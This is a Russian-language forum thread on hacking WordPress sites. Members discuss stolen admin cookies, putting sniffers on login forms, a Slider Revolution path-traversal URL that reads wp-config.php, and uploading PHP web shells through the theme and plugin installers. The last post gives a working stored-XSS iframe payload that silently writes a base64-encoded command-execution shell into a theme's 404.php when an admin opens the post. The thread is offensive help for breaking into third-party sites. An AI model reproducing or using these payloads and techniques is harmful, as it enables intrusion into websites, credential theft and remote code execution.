[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. agentru

    agentru New Member

    Joined:
    4 Dec 2010
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Друзья такой вопрос.
    Стянул куки админа с сайта на wordpress 2.3.3

    Авторизировался под ним, но в админку зайти не могу, так как cтоит http basic авторизация на папку wp-admin.
    Подскажите, какие могут быть дальнейшие действия?
     
  2. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Что можете посоветовать для версии 3.8.1, при сканировании wpsscan нет уязвимых плагинов.
     
  3. reuvenmatbil

    reuvenmatbil New Member

    Joined:
    1 Sep 2012
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    подскажите кто знает
    wp-content/plugins/bbpress/ -уязвимость показал впскан
    что поставить после bbpress/?
    при простом открытии -пустая страница, если на подобе такого подставить topic.php?id[]=12&replies=3
    пишет страница не найдена и ошибка Warning: session_start() [function.session-start]: open(/
     
  4. Toto Riina

    Toto Riina New Member

    Joined:
    24 Mar 2014
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    есть доступы к ftp и хостингу , где можно узнать пароль от админки ? если не затруднит в личку
     
  5. sara_luc

    sara_luc New Member

    Joined:
    18 Sep 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    либо через базу узнавай хеш,либо тупо сниффер на форму логина и пароля ставь
     
  6. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    122
    Likes Received:
    6
    Reputations:
    6
    to BigBear

    Этот uploader у тебя как сплойт или работает при имеющимся доступе к админке? И это для привата или гдето сие чудо можно протестить? Для каких версий WP?
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Версии с 1.0 по 3.8.6 - специально ставил каждую и переписывал сплойт под англо/ру/ино язычные сайты.

    В паблике такого не найдёшь.

    Протестировать нигде. Но в рамках паблик-ачат-тестирования - пару сайтов пробью.
     
    _________________________
    1 person likes this.
  8. Rextor

    Rextor New Member

    Joined:
    26 Feb 2014
    Messages:
    40
    Likes Received:
    2
    Reputations:
    4
    Кто-нибудь может пояснить эту уязвимость - http://1337day.com/exploit/22012 ? В частности Directory Traversal/Arbitrary code execution/Arbitrary File read. Сколько не читал, не проникнусь, что и как делается.
     
  9. simadm

    simadm Banned

    Joined:
    31 Oct 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    а есть какие нибудь софты для проверки на уязвимость? актуальные и хорошие. так как в наше время вроде уже хрен найдешь с уязвимостью +(
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    815
    Reputations:
    848
    exploit cforms 14.6 shell upload

    Плагин: cforms 14.6 - последняя версия на сегодня!
    shell upload

    оффициальный сайт:

    При настройках по умолчанию и с формой для заливки файлов, льет:
    для исключения подобной возможности, в настройках можно указать отдельную папку для заливкии положить в нее .htaccess c запретом выполнения скриптов, или переписать скрипт.
     
    _________________________
    grimnir likes this.
  11. look2009

    look2009 Member

    Joined:
    3 Jun 2009
    Messages:
    50
    Likes Received:
    23
    Reputations:
    4
    Dork : revslider.php "index of"


    Wordpress Slider Revolution Responsive <= 4.1.4 чтение файлов


    http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
     
  12. gas896

    gas896 Banned

    Joined:
    29 Jan 2014
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Не очень понятно. Если открывается, то там только цифры типа "0" "-1"
     
  13. Bahamut

    Bahamut Banned

    Joined:
    7 Dec 2011
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    Видел эти шеллы, но как лить?
     
  14. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    72
    Reputations:
    -8
    Аналогично, ковырял так и не понял как лить, а шеллы встречаются довольно часто, находил на забугор форумах описание, о том, что нужно капать в сторону файла: lib_ajax.php, а именно переменную " r " или " rs " где то здесь:
    PHP:
        function sajax_handle_client_request() {
            global 
    $sajax_export_list;

            
    $mode "";

            if (! empty(
    $_GET["rs"]))
                
    $mode "get";

            if (!empty(
    $_POST["rs"]))
                
    $mode "post";

            if (empty(
    $mode))
                return;

            
    $target "";

            
    ### 10.02. Added header
            
    header ('Content-Type: text/javascript');
            
    header ('X-Content-Type-Options: nosniff');

            if (
    $mode == "get") {
                
    ###  Bust cache in the head        
                
    header ("Expires: Mon, 26 Jul 1997 05:00:00 GMT");         ###  Date in the past
                
    header ("Last-Modified: " gmdate("D, d M Y H:i:s") . " GMT");
                
    ###  always modified
                
    header ("Cache-Control: no-cache, must-revalidate");    ###  HTTP/1.1
                
    header ("Pragma: no-cache");                            ###  HTTP/1.0
                
    $func_name = ( $_GET["rs"] );                              ### 10.2.2012 sajax_sanitize removed
                
    if (! empty($_GET["rsargs"]))
                    
    $args = ( $_GET["rsargs"] );                         ### 10.2.2012 sajax_sanitize removed
                
    else
                    
    $args = array();
            }
            else {
                
    $func_name = ( $_POST["rs"] );                             ### 10.2.2012 sajax_sanitize removed
                
    if (! empty($_POST["rsargs"]))
                    
    $args = ( $_POST["rsargs"] );                         ### 10.2.2012 sajax_sanitize removed
                
    else
                    
    $args = array();
            }
     
    #294 SuNDowN, 29 Sep 2014
    Last edited: 29 Sep 2014
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,419
    Likes Received:
    815
    Reputations:
    848
    Уязвимость в шаблонах для WordPress от автора "ronangelo" пасивная XSS

    его темы можно идентифецировать по файлу readme.txt в корне темы:

    Примеры уязвимых сайтов:

    сам уязвимый код:
    PHP:
    <?php $content_width $_GET['content_width']; ?>
    .mceContentBody {width: <?php echo $content_width?>px;}
    статья, как лить шелл в WP при XSS:
     
    _________________________
    1 person likes this.
  16. po3t

    po3t New Member

    Joined:
    10 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    у меня есть доступ к админке http://savepic.org/6279076.jpg не могу понять как туда залить шелл
     
  17. nick_sale

    nick_sale Member

    Joined:
    15 Jun 2012
    Messages:
    9
    Likes Received:
    9
    Reputations:
    0
    попробуй подставить путь,должно открыть окно загрузки плагинов

    /wp-admin/update.php?action=upload-plugin
     
  18. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    72
    Reputations:
    -8
    Зайди в установку темы, выбери файл с компа то есть твой шелл (например: shell.php) и загрузи его, выдаст какую то ошибку (всегда по разному), а шелл открывай так:
    domain/wp-content/uploads/shell.php
    или
    domain/wp-content/uploads/2014/10/shell.php
    в 99% случаях заливается.
     
  19. po3t

    po3t New Member

    Joined:
    10 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    не помогло пишет недостаточно прав

    нету пункта установка тем, могу заливать только медиафайлы

    Есть у кого еще идеи?
     
  20. djumiksc

    djumiksc New Member

    Joined:
    29 Nov 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Я так понимаю, что у тебя доступ в админку юзера без админских прав.
    Скорей всего это редактор.
    Попробуй сделать следующее:

    Создай любой пост (по теме блога) и пихни в него код
    Code:
    <iframe name='evilframe' src='/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen' style='display:none' onload="if (evilframe.document.getElementById('newcontent').value.indexOf('system') == -1) {evilframe.document.getElementById('newcontent').value += atob('PD9waHAgQHN5c3RlbSgkX0dFVFsnY21kJ10pOyA/Pg=='); evilframe.document.getElementById('submit').click();}"></iframe> 
    twentythirteen - это имя темы, замени его на свою.

    Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)

    Шелл доступен по адресу
    http://site.com/?p=123123123&cmd=id
     
    grimnir likes this.
Loading...